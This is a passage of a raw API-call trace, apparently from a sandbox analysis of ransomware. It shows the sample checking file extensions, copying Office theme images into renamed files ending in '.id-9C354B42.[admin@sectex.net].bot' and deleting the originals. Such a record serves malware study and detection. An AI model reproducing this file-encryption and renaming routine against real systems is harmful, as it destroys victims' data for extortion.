	[0044.426] lstrlenW (lpString=".bz2") returned 4
	[0044.426] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.426] lstrlenW (lpString=".7z") returned 3
	[0044.426] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76
	[0044.426] lstrlenW (lpString=".dbf") returned 4
	[0044.426] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76
	[0044.426] lstrlenW (lpString=".1cd") returned 4
	[0044.426] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76
	[0044.426] lstrlenW (lpString=".jpg") returned 4
	[0044.426] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.427] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0044.427] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0044.427] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.427] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1659) returned 1
	[0044.427] CloseHandle (hObject=0x1a8) returned 1
	[0044.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif")) returned 0x20
	[0044.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.427] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.427] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.427] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.427] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0044.429] GetLastError () returned 0x0
	[0044.429] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x67b, lpOverlapped=0x0) returned 1
	[0044.430] WriteFile (in: hFile=0x1f4, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x680, lpOverlapped=0x0) returned 1
	[0044.431] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.431] WriteFile (in: hFile=0x1f4, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0044.431] SetEndOfFile (hFile=0x1f4) returned 1
	[0044.432] CloseHandle (hObject=0x1f4) returned 1
	[0044.432] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.432] SetEndOfFile (hFile=0x1a8) returned 1
	[0044.433] CloseHandle (hObject=0x1a8) returned 1
	[0044.433] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.433] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif")) returned 1
	[0044.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74
	[0044.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74
	[0044.433] lstrlenW (lpString=".doc") returned 4
	[0044.433] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.433] lstrlenW (lpString=".docx") returned 5
	[0044.433] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.433] lstrlenW (lpString=".pdf") returned 4
	[0044.433] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.433] lstrlenW (lpString=".xls") returned 4
	[0044.433] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.433] lstrlenW (lpString=".xlsx") returned 5
	[0044.433] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.433] lstrlenW (lpString=".ppt") returned 4
	[0044.433] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74
	[0044.433] lstrlenW (lpString=".zip") returned 4
	[0044.434] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.434] lstrlenW (lpString=".rar") returned 4
	[0044.434] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.434] lstrlenW (lpString=".bz2") returned 4
	[0044.434] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.434] lstrlenW (lpString=".7z") returned 3
	[0044.434] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74
	[0044.434] lstrlenW (lpString=".dbf") returned 4
	[0044.434] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74
	[0044.434] lstrlenW (lpString=".1cd") returned 4
	[0044.434] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74
	[0044.434] lstrlenW (lpString=".jpg") returned 4
	[0044.434] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74
	[0044.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74
	[0044.434] lstrlenW (lpString=".doc") returned 4
	[0044.434] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.434] lstrlenW (lpString=".docx") returned 5
	[0044.434] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.434] lstrlenW (lpString=".pdf") returned 4
	[0044.434] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.434] lstrlenW (lpString=".xls") returned 4
	[0044.434] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.434] lstrlenW (lpString=".xlsx") returned 5
	[0044.434] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.434] lstrlenW (lpString=".ppt") returned 4
	[0044.434] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74
	[0044.434] lstrlenW (lpString=".zip") returned 4
	[0044.434] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.435] lstrlenW (lpString=".rar") returned 4
	[0044.435] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.435] lstrlenW (lpString=".bz2") returned 4
	[0044.435] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.435] lstrlenW (lpString=".7z") returned 3
	[0044.435] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74
	[0044.435] lstrlenW (lpString=".dbf") returned 4
	[0044.435] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74
	[0044.435] lstrlenW (lpString=".1cd") returned 4
	[0044.435] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74
	[0044.435] lstrlenW (lpString=".jpg") returned 4
	[0044.435] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.435] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0044.435] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0044.672] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0044.722] GetFileSizeEx (in: hFile=0x214, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=44850) returned 1
	[0044.722] CloseHandle (hObject=0x214) returned 1
	[0044.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 0x20
	[0044.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.723] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0044.723] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.723] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.723] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218
	[0044.723] GetLastError () returned 0x0
	[0044.723] ReadFile (in: hFile=0x214, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xaf32, lpOverlapped=0x0) returned 1
	[0044.809] WriteFile (in: hFile=0x218, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xaf40, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xaf40, lpOverlapped=0x0) returned 1
	[0044.897] ReadFile (in: hFile=0x214, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.897] WriteFile (in: hFile=0x218, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.897] SetEndOfFile (hFile=0x218) returned 1
	[0044.897] CloseHandle (hObject=0x218) returned 1
	[0044.897] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.897] SetEndOfFile (hFile=0x214) returned 1
	[0044.898] CloseHandle (hObject=0x214) returned 1
	[0044.899] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.899] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 1
	[0044.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75
	[0044.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75
	[0044.899] lstrlenW (lpString=".doc") returned 4
	[0044.899] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.899] lstrlenW (lpString=".docx") returned 5
	[0044.899] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.899] lstrlenW (lpString=".pdf") returned 4
	[0044.899] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.899] lstrlenW (lpString=".xls") returned 4
	[0044.899] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.899] lstrlenW (lpString=".xlsx") returned 5
	[0044.899] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.899] lstrlenW (lpString=".ppt") returned 4
	[0044.899] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75
	[0044.899] lstrlenW (lpString=".zip") returned 4
	[0044.900] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.900] lstrlenW (lpString=".rar") returned 4
	[0044.900] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.900] lstrlenW (lpString=".bz2") returned 4
	[0044.900] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.900] lstrlenW (lpString=".7z") returned 3
	[0044.900] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75
	[0044.900] lstrlenW (lpString=".dbf") returned 4
	[0044.900] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75
	[0044.900] lstrlenW (lpString=".1cd") returned 4
	[0044.900] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75
	[0044.900] lstrlenW (lpString=".jpg") returned 4
	[0044.900] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75
	[0044.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75
	[0044.900] lstrlenW (lpString=".doc") returned 4
	[0044.900] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.900] lstrlenW (lpString=".docx") returned 5
	[0044.900] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.900] lstrlenW (lpString=".pdf") returned 4
	[0044.900] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.900] lstrlenW (lpString=".xls") returned 4
	[0044.900] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.900] lstrlenW (lpString=".xlsx") returned 5
	[0044.900] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.900] lstrlenW (lpString=".ppt") returned 4
	[0044.900] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75
	[0044.900] lstrlenW (lpString=".zip") returned 4
	[0044.900] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.900] lstrlenW (lpString=".rar") returned 4
	[0044.901] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.901] lstrlenW (lpString=".bz2") returned 4
	[0044.901] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.901] lstrlenW (lpString=".7z") returned 3
	[0044.901] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75
	[0044.901] lstrlenW (lpString=".dbf") returned 4
	[0044.901] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75
	[0044.901] lstrlenW (lpString=".1cd") returned 4
	[0044.901] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75
	[0044.901] lstrlenW (lpString=".jpg") returned 4
	[0044.901] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.901] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0044.901] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0044.901] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0045.140] GetFileSizeEx (in: hFile=0x214, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=37440) returned 1
	[0045.145] CloseHandle (hObject=0x214) returned 1
	[0045.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 0x20
	[0045.156] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.156] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0045.157] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.157] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.157] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0045.167] GetLastError () returned 0x0
	[0045.167] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x9240, lpOverlapped=0x0) returned 1
	[0045.169] WriteFile (in: hFile=0x1f8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x9250, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x9250, lpOverlapped=0x0) returned 1
	[0045.170] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.171] WriteFile (in: hFile=0x1f8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0045.171] SetEndOfFile (hFile=0x1f8) returned 1
	[0045.171] CloseHandle (hObject=0x1f8) returned 1
	[0045.171] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.171] SetEndOfFile (hFile=0x1fc) returned 1
	[0045.172] CloseHandle (hObject=0x1fc) returned 1
	[0045.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.172] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 1
	[0045.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76
	[0045.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76
	[0045.172] lstrlenW (lpString=".doc") returned 4
	[0045.172] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.172] lstrlenW (lpString=".docx") returned 5
	[0045.172] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.172] lstrlenW (lpString=".pdf") returned 4
	[0045.173] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.173] lstrlenW (lpString=".xls") returned 4
	[0045.173] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.173] lstrlenW (lpString=".xlsx") returned 5
	[0045.173] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.173] lstrlenW (lpString=".ppt") returned 4
	[0045.173] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76
	[0045.173] lstrlenW (lpString=".zip") returned 4
	[0045.173] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.173] lstrlenW (lpString=".rar") returned 4
	[0045.173] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.173] lstrlenW (lpString=".bz2") returned 4
	[0045.173] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.173] lstrlenW (lpString=".7z") returned 3
	[0045.173] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76
	[0045.173] lstrlenW (lpString=".dbf") returned 4
	[0045.173] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76
	[0045.173] lstrlenW (lpString=".1cd") returned 4
	[0045.173] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76
	[0045.173] lstrlenW (lpString=".jpg") returned 4
	[0045.173] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76
	[0045.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76
	[0045.173] lstrlenW (lpString=".doc") returned 4
	[0045.173] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.173] lstrlenW (lpString=".docx") returned 5
	[0045.173] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.173] lstrlenW (lpString=".pdf") returned 4
	[0045.173] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.173] lstrlenW (lpString=".xls") returned 4
	[0045.173] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.174] lstrlenW (lpString=".xlsx") returned 5
